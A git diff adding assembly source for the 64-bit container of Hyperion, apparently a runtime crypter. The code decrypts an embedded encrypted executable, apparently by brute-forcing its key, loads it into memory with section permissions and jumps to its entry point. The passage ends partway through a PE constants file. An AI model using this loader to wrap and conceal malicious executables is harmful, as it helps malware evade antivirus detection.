+;sets the memory permissions for each section
+proc setPermissions uses rbx r12, image_file_header:QWORD, file_image_base:QWORD, \
+file_image_size:QWORD
+
+local number_of_sections:QWORD, image_base:QWORD, section_headers:QWORD,\
+pe_header_size:QWORD, str1[256]:BYTE, vprotect_ret:QWORD
+
+	mov [image_file_header],rcx
+	mov [file_image_base],rdx
+	mov [file_image_size],r8
+
+	;find section header
+	sub rax,rax
+	mov rdx,[image_file_header]
+	mov ax,[rdx+IMAGE_FILE_HEADER.NumberOfSections]
+	mov [number_of_sections],rax
+	add rdx,sizeof.IMAGE_FILE_HEADER
+	mov rax,[rdx+IMAGE_OPTIONAL_HEADER64.ImageBase]
+	mov [image_base],rax
+	;search for section header
+	lea r12,[rdx+IMAGE_OPTIONAL_HEADER64.DataDirectory]
+	mov eax,[rdx+IMAGE_OPTIONAL_HEADER64.NumberOfRvaAndSizes]
+	mov rdx,sizeof.IMAGE_DATA_DIRECTORY
+	mul rdx
+	add rax,r12
+	;first section header found
+	mov [section_headers],rax
+	mov rax,sizeof.IMAGE_SECTION_HEADER
+	mov rdx,[number_of_sections]
+	mul rdx
+	;end of section header sections found
+	add rax,[section_headers]
+	mov r12,[file_image_base]
+	sub rax,r12
+	;unaligned size of pe header in eax
+	mov [pe_header_size],rax
+
+	;set pe header page read-only
+	lea r12,[vprotect_ret]
+	invoke VirtualProtect, [image_base], [pe_header_size], PAGE_READONLY, r12
+	test rax,rax
+	jz sp_exit_error
+
+	;some output for the user
+	writeRegisterToLog [image_base], sp_exit_error
+
+	;set the section page permissions
+	mov r12,[number_of_sections]
+	mov rbx,[section_headers]
+sp_load_section_loop:
+	fastcall setSection, rbx, [image_base], [file_image_base]
+	test rax,rax
+	jz sp_exit_error
+	add rbx,sizeof.IMAGE_SECTION_HEADER
+	dec r12
+	jnz sp_load_section_loop
+
+sp_exit_success:
+	mov rax,1
+	jmp sp_exit_ret
+
+sp_exit_error:
+	sub rax,rax
+
+sp_exit_ret:
+	ret
+
+endp;
+
+;sets the complete image of the decrypted file writeable so
+;we can copy pe header and sections into it
+proc loadFile uses rbx rdi rsi, image_file_header:QWORD, file_image_base:QWORD, \
+file_image_size:QWORD
+
+local number_of_sections:QWORD, image_base:QWORD, aux:QWORD,\
+str1[256]:BYTE, vprotect_ret:QWORD, section_headers:QWORD, pe_header_size:QWORD
+
+	mov [image_file_header],rcx
+	mov [file_image_base],rdx
+	mov [file_image_size],r8
+
+	;find section header
+	;mov edx,[image_file_header]
+	sub rax,rax
+	mov rdx,[image_file_header]
+	mov ax,[rdx+IMAGE_FILE_HEADER.NumberOfSections]
+	mov [number_of_sections],rax
+	add rdx,sizeof.IMAGE_FILE_HEADER
+	mov rax,[rdx+IMAGE_OPTIONAL_HEADER64.ImageBase]
+	mov [image_base],rax
+	;make the complete image writable
+	mov esi,[rdx+IMAGE_OPTIONAL_HEADER64.SizeOfImage]
+	mov [aux],rdx ;store edx, we need it later
+	lea rbx,[vprotect_ret]
+	invoke VirtualProtect, [image_base], rsi, PAGE_READWRITE, rbx
+	test rax,rax
+	jz lf_exit_error
+
+	;some output for the user
+	writeWithNewLine createStringLoadedPEHeader, str1, lf_exit_error
+	writeRegisterToLog [image_base], lf_exit_error
+
+	mov rdx,[aux] ;restore rdx
+	;continue search for section header
+	lea rbx,[rdx+IMAGE_OPTIONAL_HEADER64.DataDirectory]
+	mov eax,[rdx+IMAGE_OPTIONAL_HEADER64.NumberOfRvaAndSizes]
+	mov rdx,sizeof.IMAGE_DATA_DIRECTORY
+	mul rdx
+	add rax,rbx
+
+	;first section header found
+	mov [section_headers],rax
+	mov rax,sizeof.IMAGE_SECTION_HEADER
+	mov rdx,[number_of_sections]
+	mul rdx
+	;end of section header sections found
+	add rax,[section_headers]
+	mov rbx,[file_image_base]
+	sub rax,rbx
+	;unaligned size of pe header in eax
+	mov [pe_header_size],rax
+
+	;copy header to memory
+	mov rdi,[image_base]
+	mov rsi,[file_image_base]
+	mov rcx,[pe_header_size]
+	rep movsb
+
+	;load the sections
+	mov rsi,[number_of_sections]
+	mov rbx,[section_headers]
+lf_load_section_loop:
+	fastcall loadSection, rbx, [image_base], [file_image_base]
+	test rax,rax
+	jz lf_exit_error
+	add rbx,sizeof.IMAGE_SECTION_HEADER
+	dec rsi
+	jnz lf_load_section_loop
+
+lf_exit_success:
+	mov rax,[image_base]
+	jmp lf_exit_ret
+
+lf_exit_error:
+	sub rax,rax
+
+lf_exit_ret:
+	ret
+endp
+
+;load the corresponding section into memory
+proc loadSection uses rdi rsi r12, section_header:QWORD, image_base:QWORD,\
+file_image_base:QWORD
+
+local str1[256]:BYTE
+
+	mov [section_header],rcx
+	mov [image_base],rdx
+	mov [file_image_base],r8
+
+	;copy from file into memory
+	mov rdx,[section_header]
+	mov edi,[rdx+IMAGE_SECTION_HEADER.VirtualAddress]
+	add rdi,[image_base]
+	mov esi,[rdx+IMAGE_SECTION_HEADER.PointerToRawData]
+	add rsi,[file_image_base]
+	mov ecx,[rdx+IMAGE_SECTION_HEADER.SizeOfRawData]
+	rep movsb
+	writeSectionNameAndAddressToLog
+
+ls_exit_success:
+	mov rax,1
+	jmp ls_exit_ret
+
+ls_exit_error:
+	sub rax,rax
+
+ls_exit_ret:
+	ret
+
+endp
+
+;set the memory page permission for the corresponding section
+proc setSection uses rbx r12, section_header:QWORD, image_base:QWORD,\
+file_image_base:QWORD
+
+local section_flags:QWORD, vprotect_ret:QWORD, str1[256]:BYTE
+
+	mov [section_header],rcx
+	mov [image_base],rdx
+	mov [file_image_base],r8
+
+	;section execute/read/write?
+	mov rdx,[section_header]
+	mov ebx,[rdx+IMAGE_SECTION_HEADER.Characteristics]
+	and ebx,IMAGE_SCN_MEM_EXECUTE or IMAGE_SCN_MEM_READ or IMAGE_SCN_MEM_WRITE
+	cmp ebx,IMAGE_SCN_MEM_EXECUTE or IMAGE_SCN_MEM_READ or IMAGE_SCN_MEM_WRITE
+	jne ssn_no_execute_read_write
+	mov rax,PAGE_EXECUTE_READWRITE
+	mov [section_flags],rax
+	jmp ssn_set_memory
+ssn_no_execute_read_write:
+	;section execute/read?
+	mov ebx,[rdx+IMAGE_SECTION_HEADER.Characteristics]
+	and ebx,IMAGE_SCN_MEM_EXECUTE or IMAGE_SCN_MEM_READ
+	cmp ebx,IMAGE_SCN_MEM_EXECUTE or IMAGE_SCN_MEM_READ
+	jne ssn_no_execute_read
+	mov rax,PAGE_EXECUTE_READ
+	mov [section_flags],rax
+	jmp ssn_set_memory
+ssn_no_execute_read:
+	;section read/write?
+	mov ebx,[rdx+IMAGE_SECTION_HEADER.Characteristics]
+	and ebx,IMAGE_SCN_MEM_READ or IMAGE_SCN_MEM_WRITE
+	cmp ebx,IMAGE_SCN_MEM_READ or IMAGE_SCN_MEM_WRITE
+	jne ssn_no_read_write
+	mov rax,PAGE_READWRITE
+	mov [section_flags],rax
+	jmp ssn_set_memory
+ssn_no_read_write:
+	;section read?
+	mov ebx,[rdx+IMAGE_SECTION_HEADER.Characteristics]
+	and ebx,IMAGE_SCN_MEM_READ
+	cmp ebx,IMAGE_SCN_MEM_READ
+	jne ssn_no_read
+	mov rax,PAGE_READONLY
+	mov [section_flags],rax
+	jmp ssn_set_memory
+ssn_no_read:
+	mov rax,PAGE_NOACCESS
+	mov [section_flags],rax
+
+	;set section permissions
+ssn_set_memory:
+	mov eax,[rdx+IMAGE_SECTION_HEADER.VirtualAddress]
+	add rax,[image_base]
+	mov ebx,[rdx+IMAGE_SECTION_HEADER.VirtualSize]
+	lea r12,[vprotect_ret]
+	invoke VirtualProtect,rax,rbx,[section_flags], r12
+	test rax,rax
+	jz ssn_exit_error
+
+	;some output for the user
+	mov rdx,[section_header]
+	mov eax,[rdx+IMAGE_SECTION_HEADER.VirtualAddress]
+	add rax,[image_base]
+	writeRegisterToLog rax, ssn_exit_error
+
+ssn_exit_success:
+	mov rax,1
+	jmp ssn_exit_ret
+
+ssn_exit_error:
+	sub rax,rax
+
+ssn_exit_ret:
+	ret
+
+endp;
+
+;check MZ und PE signature and return start of the image file header
+proc verifyPE, image_base:QWORD
+
+	mov [image_base], rcx
+
+	mov rcx,[image_base]
+	mov ax,[rcx+IMAGE_DOS_HEADER.e_magic]
+	cmp ax,IMAGE_DOS_SIGNATURE
+	jne vpe_exit_error
+	mov eax,[rcx+IMAGE_DOS_HEADER.e_lfanew]
+	add rcx,rax
+	mov eax,dword [rcx]
+	cmp eax,IMAGE_NT_SIGNATURE
+	jne vpe_exit_error
+	add rcx,4
+
+vpe_exit_success:
+	mov rax,rcx
+	ret
+
+vpe_exit_error:
+	sub rax,rax
+	ret
+
+endp
+
+;First 4 bytes of data seciton contain a checksum
+;Verify that the checksum is correct
+;TODO: CHECKSUM SIZE is atm hardcoded
+proc verifyChecksum uses rbx rdi, section_address:QWORD, section_size:QWORD
+
+	mov [section_address],rcx
+	mov [section_size],rdx
+
+	mov rbx,[section_address]
+	mov eax,[rbx]
+	add rbx,4
+	mov rcx,[section_size]
+	sub rcx,4
+	;checksum is in eax
+	;pointer to file in ebx
+	;size of file in ecx
+	sub rdi,rdi
+vs_calc_cs:
+	sub rdx,rdx
+	mov dl,byte [rbx]
+	add edi,edx
+	inc rbx
+	dec rcx
+	jnz vs_calc_cs
+	;calculated checksum is in edi
+	cmp edi,eax
+	jne vs_exit_error
+
+vs_exit_success:
+	mov eax,1
+	jmp vs_exit_ret
+
+vs_exit_error:
+	sub eax,eax
+
+vs_exit_ret:
+	ret
+
+endp
diff --git a/binary/hyperion/source/Src/Container/64/logfile_disable.asm b/binary/hyperion/source/Src/Container/64/logfile_disable.asm
new file mode 100644
index 0000000..bad6210
--- /dev/null
+++ b/binary/hyperion/source/Src/Container/64/logfile_disable.asm
@@ -0,0 +1,114 @@
+macro createStringBruteforcing location
+{
+
+}
+
+macro createStringSettingPermissions location
+{
+
+}
+
+macro createStringOrdinal location
+{
+
+}
+
+macro createStringName location
+{
+
+}
+
+macro createStringProcessImportDirectory location
+{
+
+}
+
+macro createStringFoundImportTable location
+{
+
+}
+
+macro createStringLoadingFilesAPIs location
+{
+
+}
+
+macro createStringMappingFileInMemory location
+{
+
+}
+
+macro createStringLoaded location
+{
+
+}
+
+macro createStringLoadedPEHeader location
+{
+
+}
+
+macro createStringVerifyPE location
+{
+
+}
+
+macro createStringVerifyChecksum location
+{
+
+}
+
+macro createStringDone location
+{
+
+}
+
+macro createStringError location
+{
+
+}
+
+macro createStringStartingHyperion location
+{
+
+}
+
+macro createStringStartingHyperionLines location
+{
+
+}
+
+macro createStringLogTxt location
+{
+
+}
+
+;writes a string and a newline to the logfile
+macro writeWithNewLine char_sequence, char_buffer, error_exit{
+    char_sequence char_buffer
+
+}
+
+;write a string to the logfile
+macro writeLog content, exit_error{
+
+}
+
+;delete old log file and create a new one
+macro initLogFile exit_error{
+
+}
+
+;write a newline into logfile
+macro writeNewLineToLog exit_error{
+
+}
+
+;write a register value into logile
+macro writeRegisterToLog value, exit_error{
+
+}
+
+macro writeSectionNameAndAddressToLog{
+
+}
\ No newline at end of file
diff --git a/binary/hyperion/source/Src/Container/64/logfile_enable.asm b/binary/hyperion/source/Src/Container/64/logfile_enable.asm
new file mode 100644
index 0000000..28de8f1
--- /dev/null
+++ b/binary/hyperion/source/Src/Container/64/logfile_enable.asm
@@ -0,0 +1,605 @@
+;-------------------------------------------
+;the content of this file is excluded,	    |
+;when the user disables logging features    |
+;in hyperion command line. pls keep in mind |
+;and dont rely on its existence.	    |
+;-------------------------------------------  
+
+;--- Begin Macro Section ---
+
+macro createStringBruteforcing location
+{
+	 mov [location+0],'B'
+	 mov [location+1],'r'
+	 mov [location+2],'u'
+	 mov [location+3],'t'
+	 mov [location+4],'e'
+	 mov [location+5],'f'
+	 mov [location+6],'o'
+	 mov [location+7],'r'
+	 mov [location+8],'c'
+	 mov [location+9],'i'
+	 mov [location+10],'n'
+	 mov [location+11],'g'
+	 mov [location+12],' '
+	 mov [location+13],'K'
+	 mov [location+14],'e'
+	 mov [location+15],'y'
+	 mov [location+16],0
+	 lea rax,[location]
+}
+
+macro createStringSettingPermissions location
+{
+	 mov [location+0],'S'
+	 mov [location+1],'e'
+	 mov [location+2],'t'
+	 mov [location+3],'t'
+	 mov [location+4],'i'
+	 mov [location+5],'n'
+	 mov [location+6],'g'
+	 mov [location+7],' '
+	 mov [location+8],'S'
+	 mov [location+9],'e'
+	 mov [location+10],'c'
+	 mov [location+11],'t'
+	 mov [location+12],'i'
+	 mov [location+13],'o'
+	 mov [location+14],'n'
+	 mov [location+15],' '
+	 mov [location+16],'P'
+	 mov [location+17],'e'
+	 mov [location+18],'r'
+	 mov [location+19],'m'
+	 mov [location+20],'i'
+	 mov [location+21],'s'
+	 mov [location+22],'s'
+	 mov [location+23],'i'
+	 mov [location+24],'o'
+	 mov [location+25],'n'
+	 mov [location+26],'s'
+	 mov [location+27],0
+	 lea rax,[location]
+}
+
+macro createStringOrdinal location
+{
+	 mov [location+0],'O'
+	 mov [location+1],'r'
+	 mov [location+2],'d'
+	 mov [location+3],'i'
+	 mov [location+4],'n'
+	 mov [location+5],'a'
+	 mov [location+6],'l'
+	 mov [location+7],':'
+	 mov [location+8],' '
+	 mov [location+9],0
+	 lea rax,[location]
+}
+
+macro createStringName location
+{
+	 mov [location+0],'N'
+	 mov [location+1],'a'
+	 mov [location+2],'m'
+	 mov [location+3],'e'
+	 mov [location+4],':'
+	 mov [location+5],' '
+	 mov [location+6],0
+	 lea rax,[location]
+}
+
+macro createStringProcessImportDirectory location
+{
+	 mov [location+0],'P'
+	 mov [location+1],'r'
+	 mov [location+2],'o'
+	 mov [location+3],'c'
+	 mov [location+4],'e'
+	 mov [location+5],'s'
+	 mov [location+6],'s'
+	 mov [location+7],'i'
+	 mov [location+8],'n'
+	 mov [location+9],'g'
+	 mov [location+10],' '
+	 mov [location+11],'I'
+	 mov [location+12],'m'
+	 mov [location+13],'p'
+	 mov [location+14],'o'
+	 mov [location+15],'r'
+	 mov [location+16],'t'
+	 mov [location+17],' '
+	 mov [location+18],'D'
+	 mov [location+19],'i'
+	 mov [location+20],'r'
+	 mov [location+21],'e'
+	 mov [location+22],'c'
+	 mov [location+23],'t'
+	 mov [location+24],'o'
+	 mov [location+25],'r'
+	 mov [location+26],'y'
+	 mov [location+27],':'
+	 mov [location+28],0
+	 lea rax,[location]
+}
+
+macro createStringFoundImportTable location
+{
+	 mov [location+0],'I'
+	 mov [location+1],'m'
+	 mov [location+2],'p'
+	 mov [location+3],'o'
+	 mov [location+4],'r'
+	 mov [location+5],'t'
+	 mov [location+6],' '
+	 mov [location+7],'T'
+	 mov [location+8],'a'
+	 mov [location+9],'b'
+	 mov [location+10],'l'
+	 mov [location+11],'e'
+	 mov [location+12],':'
+	 mov [location+13],0
+	 lea rax,[location]
+}
+
+macro createStringLoadingFilesAPIs location
+{
+	 mov [location+0],'L'
+	 mov [location+1],'o'
+	 mov [location+2],'a'
+	 mov [location+3],'d'
+	 mov [location+4],'i'
+	 mov [location+5],'n'
+	 mov [location+6],'g'
+	 mov [location+7],' '
+	 mov [location+8],'A'
+	 mov [location+9],'P'
+	 mov [location+10],'I'
+	 mov [location+11],'s'
+	 mov [location+12],0
+	 lea rax,[location]
+}
+
+macro createStringMappingFileInMemory location
+{
+	 mov [location+0],'M'
+	 mov [location+1],'a'
+	 mov [location+2],'p'
+	 mov [location+3],'p'
+	 mov [location+4],'i'
+	 mov [location+5],'n'
+	 mov [location+6],'g'
+	 mov [location+7],' '
+	 mov [location+8],'F'
+	 mov [location+9],'i'
+	 mov [location+10],'l'
+	 mov [location+11],'e'
+	 mov [location+12],' '
+	 mov [location+13],'i'
+	 mov [location+14],'n'
+	 mov [location+15],'t'
+	 mov [location+16],'o'
+	 mov [location+17],' '
+	 mov [location+18],'M'
+	 mov [location+19],'e'
+	 mov [location+20],'m'
+	 mov [location+21],'o'
+	 mov [location+22],'r'
+	 mov [location+23],'y'
+	 mov [location+24],0
+	 lea rax,[location]
+}
+
+macro createStringLoaded location
+{
+	 mov [location+0],'L'
+	 mov [location+1],'o'
+	 mov [location+2],'a'
+	 mov [location+3],'d'
+	 mov [location+4],'e'
+	 mov [location+5],'d'
+	 mov [location+6],' '
+	 mov [location+7],0
+	 lea rax,[location]
+}
+
+macro createStringLoadedPEHeader location
+{
+	 mov [location+0],'S'
+	 mov [location+1],'e'
+	 mov [location+2],'t'
+	 mov [location+3],' '
+	 mov [location+4],'I'
+	 mov [location+5],'m'
+	 mov [location+6],'a'
+	 mov [location+7],'g'
+	 mov [location+8],'e'
+	 mov [location+9],' '
+	 mov [location+10],'w'
+	 mov [location+11],'r'
+	 mov [location+12],'i'
+	 mov [location+13],'t'
+	 mov [location+14],'a'
+	 mov [location+15],'b'
+	 mov [location+16],'l'
+	 mov [location+17],'e'
+	 mov [location+18],':'
+	 mov [location+19],0
+	 lea rax,[location]
+}
+
+macro createStringVerifyPE location
+{
+	 mov [location+0],'V'
+	 mov [location+1],'e'
+	 mov [location+2],'r'
+	 mov [location+3],'i'
+	 mov [location+4],'f'
+	 mov [location+5],'y'
+	 mov [location+6],'i'
+	 mov [location+7],'n'
+	 mov [location+8],'g'
+	 mov [location+9],' '
+	 mov [location+10],'P'
+	 mov [location+11],'E'
+	 mov [location+12],0
+	 lea rax,[location]
+}
+
+macro createStringVerifyChecksum location
+{
+	 mov [location+0],'V'
+	 mov [location+1],'e'
+	 mov [location+2],'r'
+	 mov [location+3],'i'
+	 mov [location+4],'f'
+	 mov [location+5],'y'
+	 mov [location+6],'i'
+	 mov [location+7],'n'
+	 mov [location+8],'g'
+	 mov [location+9],' '
+	 mov [location+10],'C'
+	 mov [location+11],'h'
+	 mov [location+12],'e'
+	 mov [location+13],'c'
+	 mov [location+14],'k'
+	 mov [location+15],'s'
+	 mov [location+16],'u'
+	 mov [location+17],'m'
+	 mov [location+18],0
+	 lea rax,[location]
+}
+
+macro createStringDone location
+{
+	 mov [location+0],'D'
+	 mov [location+1],'o'
+	 mov [location+2],'n'
+	 mov [location+3],'e'
+	 mov [location+4],0
+	 lea rax,[location]
+}
+
+macro createStringError location
+{
+	 mov [location+0],'E'
+	 mov [location+1],'r'
+	 mov [location+2],'r'
+	 mov [location+3],'o'
+	 mov [location+4],'r'
+	 mov [location+5],0
+	 lea rax,[location]
+}
+
+macro createStringStartingHyperion location
+{
+	 mov [location+00],'H'
+	 mov [location+01],'y'
+	 mov [location+02],'p'
+	 mov [location+03],'e'
+	 mov [location+04],'r'
+	 mov [location+05],'i'
+	 mov [location+06],'o'
+	 mov [location+07],'n'
+	 mov [location+08],' '
+	 mov [location+09],'L'
+	 mov [location+10],'o'
+	 mov [location+11],'g'
+	 mov [location+12],'f'
+	 mov [location+13],'i'
+	 mov [location+14],'l'
+	 mov [location+15],'e'
+	 mov [location+16],13
+	 mov [location+17],10
+	 mov [location+18],0
+	 lea rax,[location]
+}
+
+macro createStringStartingHyperionLines location
+{
+	 mov [location+00],'-'
+	 mov [location+01],'-'
+	 mov [location+02],'-'
+	 mov [location+03],'-'
+	 mov [location+04],'-'
+	 mov [location+05],'-'
+	 mov [location+06],'-'
+	 mov [location+07],'-'
+	 mov [location+08],'-'
+	 mov [location+09],'-'
+	 mov [location+10],'-'
+	 mov [location+11],'-'
+	 mov [location+12],'-'
+	 mov [location+13],'-'
+	 mov [location+14],'-'
+	 mov [location+15],'-'
+	 mov [location+16],13
+	 mov [location+17],10
+	 mov [location+18],0
+	 lea rax,[location]
+}
+
+macro createStringLogTxt location
+{
+	 mov [location+0],'l'
+	 mov [location+1],'o'
+	 mov [location+2],'g'
+	 mov [location+3],'.'
+	 mov [location+4],'t'
+	 mov [location+5],'x'
+	 mov [location+6],'t'
+	 mov [location+7],0
+	 lea rax,[location]
+}
+
+;writes a string and a newline to the logfile
+macro writeWithNewLine char_sequence, char_buffer, error_exit{
+	char_sequence char_buffer
+	lea rax,[str1]
+	fastcall writeLog_, rax
+	test rax,rax
+	jz error_exit
+	fastcall writeNewLineToLog_
+	test rax,rax
+	jz error_exit
+}
+
+;write a string to the logfile
+macro writeLog content, error_exit{
+	fastcall writeLog_, content
+	test rax,rax
+	jz error_exit
+}
+
+;delete old log file and create a new one
+macro initLogFile error_exit{
+	fastcall initLogFile_, error_exit
+	test rax,rax
+	jz error_exit
+}
+
+;write a newline into logfile
+macro writeNewLineToLog error_exit{
+	fastcall writeNewLineToLog_
+	test rax,rax
+	jz error_exit
+}
+
+;write a register value into logile
+macro writeRegisterToLog value, error_exit{
+	fastcall writeRegisterToLog_, value
+	test rax,rax
+	jz error_exit
+}
+
+;TODO: Does not really fit into architecture
+macro writeSectionNameAndAddressToLog{
+	lea rdi,[str1]
+	mov byte [rdi+8],0
+	mov rdx,[section_header]
+	lea rsi,[rdx+IMAGE_SECTION_HEADER._Name]
+	mov rcx,8
+	mov r12, rdi
+	rep movsb
+	mov rdi, r12
+	writeLog rdi, ls_exit_error
+	writeNewLineToLog ls_exit_error
+	mov rdx,[section_header]
+	mov eax,[rdx+IMAGE_SECTION_HEADER.VirtualAddress]
+	add rax,[image_base]
+	writeRegisterToLog rax, ls_exit_error
+}
+
+;--- End Macro Section ---
+
+;get the length of a string
+proc strlen_ uses rdi rcx, string_ptr:QWORD
+
+	 mov [string_ptr],rcx
+
+	 mov rdi,[string_ptr]
+	 sub rcx, rcx
+	 sub al, al
+	 not rcx
+	 cld
+	 repne scasb
+	 not rcx
+	 dec rcx
+	 mov rax,rcx
+
+	 ret
+
+endp
+
+;write  into log.txt
+;returns false if an eerror occurs
+proc writeLog_ content:QWORD
+
+local str1[256]:BYTE, oldlogsize:QWORD, newlogsize:QWORD, contentsize:QWORD,\
+      filehandle:QWORD, filemappingobject:QWORD, mapaddress:QWORD, retval:QWORD
+
+	 mov [content],rcx
+
+	 ;open file
+	 createStringLogTxt str1
+	 sub r11,r11
+	 invoke CreateFile, rax, GENERIC_READ or GENERIC_WRITE, FILE_SHARE_READ, r11, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, r11
+	 mov [retval],rax
+	 test rax,rax
+	 jz wl_logexit
+	 mov [filehandle],rax
+
+	 ;get logfile size
+	 invoke GetFileSize, qword [filehandle], 0
+	 mov [oldlogsize],rax
+
+	 ;get size of string for logfile for concatenation
+	 fastcall strlen_, qword [content]
+	 mov [contentsize], rax
+	 add rax,qword [oldlogsize]
+	 mov [newlogsize], rax
+
+	 ;create the file mapping
+	 sub r10,r10
+	 invoke CreateFileMapping, qword [filehandle], r10, PAGE_READWRITE, r10, rax, r10
+	 mov [retval],rax
+	 test rax, rax
+	 jz wl_closelogfile
+	 mov [filemappingobject],rax
+
+	 sub r10,r10
+	 invoke MapViewOfFile, rax, FILE_MAP_ALL_ACCESS, r10, r10, qword [newlogsize]
+	 mov [retval],rax
+	 test rax, rax
+	 jz wl_closemaphandle
+	 mov [mapaddress],rax
+
+	 ;copy string into map
+	 add rax,[oldlogsize]
+	 mov rdi,rax
+	 mov rsi,[content]
+	 mov rcx,[contentsize]
+	 repz movsb
+	 mov [retval],1
+
+wl_unmapfile:
+	 invoke UnmapViewOfFile, qword [mapaddress]
+
+wl_closemaphandle:
+	 invoke CloseHandle, qword [filemappingobject]
+
+wl_closelogfile:
+	 invoke CloseHandle, qword [filehandle]
+
+wl_logexit:
+	 mov rax,[retval]
+	 ret;
+
+endp
+
+;adds a  to the logfile
+;returns false if an error occurs
+proc writeNewLineToLog_
+
+local str1[3]:BYTE
+
+	 lea rax,[str1]
+	 mov byte [rax+0],13
+	 mov byte [rax+1],10
+	 mov byte [rax+2],0
+	 fastcall writeLog_, rax
+	 ret
+
+endp
+
+;returns false if an error occurs
+proc writeRegisterToLog_ Value:QWORD
+
+local str1[18]:BYTE, retval:QWORD
+	 mov [Value],rcx
+
+	 lea rax,[str1]
+	 fastcall binToString_, rax, [Value]
+	 fastcall writeLog_, rax
+	 mov [retval],rax
+	 test rax,rax
+	 jz wrtl_exit
+	 fastcall writeNewLineToLog_
+	 mov [retval],rax
+	 test rax,rax
+	 jz wrtl_exit
+
+wrtl_exit:
+	 mov rax,[retval]
+	 ret
+
+endp
+
+;converts  into an 8 byte string and stores it 
+proc binToString_ buffer:QWORD, bin:QWORD
+	 mov [buffer],rcx
+	 mov [bin], rdx
+
+	 mov r10,[bin]
+	 mov rcx,16
+bts_next_byte:
+	 mov rax,r10
+	 and rax,0000000fh
+	 cmp rax,9
+	 jg bts_add_55
+bts_add_48:
+	 add rax,48
+	 jmp bts_store_bin
+bts_add_55:
+	 add rax,55
+bts_store_bin:
+	 dec rcx
+	 mov rdx,[buffer]
+	 mov byte [rcx+rdx],al
+	 test rcx,rcx
+	 jz bts_finished_conversion
+	 shr r10,4
+	 jmp bts_next_byte
+
+bts_finished_conversion:
+	 mov rax,[buffer]
+	 mov byte [rax+16],0
+	 ret
+endp
+
+;Write initial message into logfile
+proc initLogFile_
+
+local str1[256]:BYTE
+
+	createStringLogTxt str1
+	invoke DeleteFile, rax
+
+	createStringStartingHyperionLines str1
+	fastcall writeLog_, rax
+	test rax,rax
+	jz ilf_exit_error
+
+	createStringStartingHyperion str1
+	fastcall writeLog_, rax
+	test rax,rax
+	jz ilf_exit_error
+
+	createStringStartingHyperionLines str1
+	fastcall writeLog_, rax
+	test rax,rax
+	jz ilf_exit_error
+
+	fastcall writeNewLineToLog_
+	test rax,rax
+	jz ilf_exit_error
+
+ilf_exit_success:
+	mov rax,1
+	ret
+
+ilf_exit_error:
+	sub rax,rax
+	ret
+
+endp
\ No newline at end of file
diff --git a/binary/hyperion/source/Src/Container/64/main.asm b/binary/hyperion/source/Src/Container/64/main.asm
new file mode 100644
index 0000000..1d0da63
--- /dev/null
+++ b/binary/hyperion/source/Src/Container/64/main.asm
@@ -0,0 +1,125 @@
+; Hyperion 64-Bit container.exe
+
+include 'image_base.inc'
+include 'main_prolog.inc' ;format PE64 ...
+entry start
+
+include '..\..\..\Fasm\INCLUDE\win64a.inc'
+include 'pe.inc'
+;automatically generated by hyperion cpp stub
+include 'key_size.inc'
+include 'infile_size.inc'
+include 'image_size.inc'
+;---
+
+SIZE_DATA_SECTION_NAME	equ 5
+SIZE_CHECKSUM		equ 4
+
+;this contains the decrypted and loaded executable
+section '.bss' data readable writeable
+
+	 decrypted_infile: db IMAGE_SIZE dup (?)
+
+;--------------------------------------------------
+
+;this contains the encrypted exe
+section '.data' data readable writeable
+
+	 encrypted_infile: include 'infile_array.inc'
+
+;--------------------------------------------------
+
+section '.text' code readable executable
+
+
+;automatically generated by hyperion cpp stub
+include 'logfile_select.asm'
+include 'decryption_payload.asm'
+;pe loader functions
+include 'loadexecutable.asm'
+
+;---
+
+start:
+	 sub rsp,8
+	 fastcall MainMethod
+	 test rax,rax
+	 jz the_end_my_friend
+	 ;file was loaded, execute it
+	 add rsp,8
+	 jmp rax
+the_end_my_friend:
+	 invoke ExitProcess,0
+
+proc MainMethod uses rbx
+	 local str1[256]:BYTE
+
+	 ;create logfile and write initial message into it
+	 initLogFile main_exit
+
+	 ;decrypt exe in data section
+	 fastcall decryptExecutable, encrypted_infile
+	 test rax,rax
+	 jz main_exiterror
+
+	 ;load the executable at its image base
+	 ;(this will overwrite current MZ header and bss section)
+	 fastcall loadExecutable, encrypted_infile
+	 test rax,rax
+	 jz main_exiterror
+
+	 ;start program execution
+	 mov rdx,IMAGE_BASE
+	 xor rax,rax
+	 mov eax,[rdx+IMAGE_DOS_HEADER.e_lfanew]
+	 add rax,rdx
+	 add rax,4
+	 ;image file header now in eax
+	 add rax,sizeof.IMAGE_FILE_HEADER
+	 xor rdx,rdx
+	 mov edx,[rax+IMAGE_OPTIONAL_HEADER64.AddressOfEntryPoint]
+	 mov rax,IMAGE_BASE
+	 add rdx,rax
+	 ;entry point of original exe is now in rbx
+	 mov rbx,rdx
+
+;finished without errors
+main_exitsuccess:
+	 writeNewLineToLog main_exit
+	 createStringDone str1
+	 writeLog rax, main_exit
+	 mov rax,rbx
+	 jmp main_exit
+
+;finished with errors after logfile API loading
+main_exiterror:
+	 writeNewLineToLog main_exit
+	 createStringError str1
+	 writeLog rax, main_exit
+	 sub rax,rax
+
+main_exit:
+	 ret
+
+endp
+
+;import table
+section '.idata' import data readable writeable
+
+	 library kernel,'KERNEL32.DLL'
+
+	 import kernel,\
+	    LoadLibrary,'LoadLibraryA',\
+	    GetProcAddress,'GetProcAddress',\
+	    GetFileSize,'GetFileSize',\
+	    CreateFileMapping,'CreateFileMappingA',\
+	    MapViewOfFile,'MapViewOfFile',\
+	    UnmapViewOfFile,'UnmapViewOfFile',\
+	    CreateFile,'CreateFileA',\
+	    CloseHandle,'CloseHandle',\
+	    DeleteFile,'DeleteFileA',\
+	    GetModuleHandle,'GetModuleHandle',\
+	    VirtualAlloc,'VirtualAlloc',\
+	    VirtualProtect,'VirtualProtect',\
+	    VirtualFree,'VirtualFree',\
+	    ExitProcess,'ExitProcess'
diff --git a/binary/hyperion/source/Src/Container/64/pe.inc b/binary/hyperion/source/Src/Container/64/pe.inc
new file mode 100644
index 0000000..433cde6
--- /dev/null
+++ b/binary/hyperion/source/Src/Container/64/pe.inc
@@ -0,0 +1,253 @@
+IMAGE_DOS_SIGNATURE = 05A4Dh
+IMAGE_OS2_SIGNATURE = 0454Eh
+IMAGE_OS2_SIGNATURE_LE = 0454Ch
+IMAGE_VXD_SIGNATURE = 0454Ch
+IMAGE_LX_SIGNATURE = 0584Ch
+IMAGE_NT_SIGNATURE = 04550h
+
+IMAGE_FILE_MACHINE_UNKNOWN	=	0
+IMAGE_FILE_MACHINE_I386 =	014ch
+IMAGE_FILE_MACHINE_R3000	=	0162h
+IMAGE_FILE_MACHINE_R4000	=	0166h
